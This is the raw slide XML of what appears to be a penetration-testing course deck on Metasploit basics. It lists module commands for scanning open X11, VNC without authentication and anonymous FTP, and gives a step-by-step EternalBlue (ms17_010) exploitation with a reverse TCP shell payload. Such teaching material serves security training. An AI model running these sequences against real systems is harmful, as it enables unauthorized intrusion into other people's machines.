          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use auxiliary/scanner/x11/open_x11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>traying 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If Successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>	Open X Server @ 192.168.1.23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894F6F77-717F-49DA-EB37-150FAA4A11BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212437" y="2045754"/>
            <a:ext cx="2811988" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VNC Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F07D4AF-EFC9-A83D-1FC2-09352F7C5E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838955" y="2694208"/>
            <a:ext cx="4370940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>vnc_none_auth</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2766134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1772378" y="324153"/>
            <a:ext cx="8647244" cy="244259"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ENJOY OF  E X P L O I T A T I O N</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400"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3255F2AB-631D-F26B-F120-67C818E8A577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="818147"/>
            <a:ext cx="10860730" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basics Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The Metasploit Framework contains hundreds of modules, and it is nearly impossible to remember them all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>from msfconsole will display every module available in the Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Show auxiliary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show options </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53289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7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72189" y="136527"/>
            <a:ext cx="9518104" cy="807954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manage It </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69470760-08B1-89DF-0632-5409991EF987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206976" y="1341903"/>
            <a:ext cx="6098058"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use windows/smb/ms08_067_netpi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Back</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SEARCH BY NAME &gt;&gt; 		 Search mssql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEARCH BY NUMBER &gt;&gt;	 Search ms08_67</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400591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7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-7853"/>
            <a:ext cx="9518104" cy="807954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manage It In Windows  </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800"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BDB6635F-D1BC-0923-E64A-0AA7C6751BCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463216" y="926432"/>
            <a:ext cx="11728784" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo msfconsole </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search Blue </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use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/smb_ms17_010</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Set RHOSTS &lt;HOST&gt; </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Use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ms17_010_eternalblue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Info</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set RHOST &lt;HOST&gt;</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show payloads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You can set payload by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>set payload windows/shell/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10. exploit or run </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11 . show options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83847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1AD0F-6103-8934-F149-C07E7F6D6878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126332" y="117385"/>
            <a:ext cx="2890535" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manage It  On Linux </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="28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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADA9BD2-7CBD-AD88-6D19-8F3779047940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372979" y="1082842"/>
            <a:ext cx="5596340" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo nmap -p- &lt;HOST&gt;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sudo msfconsole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search Anonymous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TO SCAN &gt;&gt; use auxiliary/scanner/ftp/anonymous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ftp &lt;HOST&gt;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Username : anonymous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password : anonymous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exit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16340321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7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-7853"/>
            <a:ext cx="9518104" cy="807954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD9C8E86-5D14-C44C-0194-F72208B4E50D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840259" y="1000897"/>
            <a:ext cx="2185598" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show payloads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show options </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show targets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Info</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Set </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setg And unsetg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36615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7F6FE-0C59-DE87-AD4D-E426C8319617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-7853"/>
            <a:ext cx="9518104" cy="807954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15046E0C-787A-9601-49D8-3DBFB831D408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951470" y="1309816"/>
            <a:ext cx="11240530" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.  Exploit –j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run on the background</a:t>
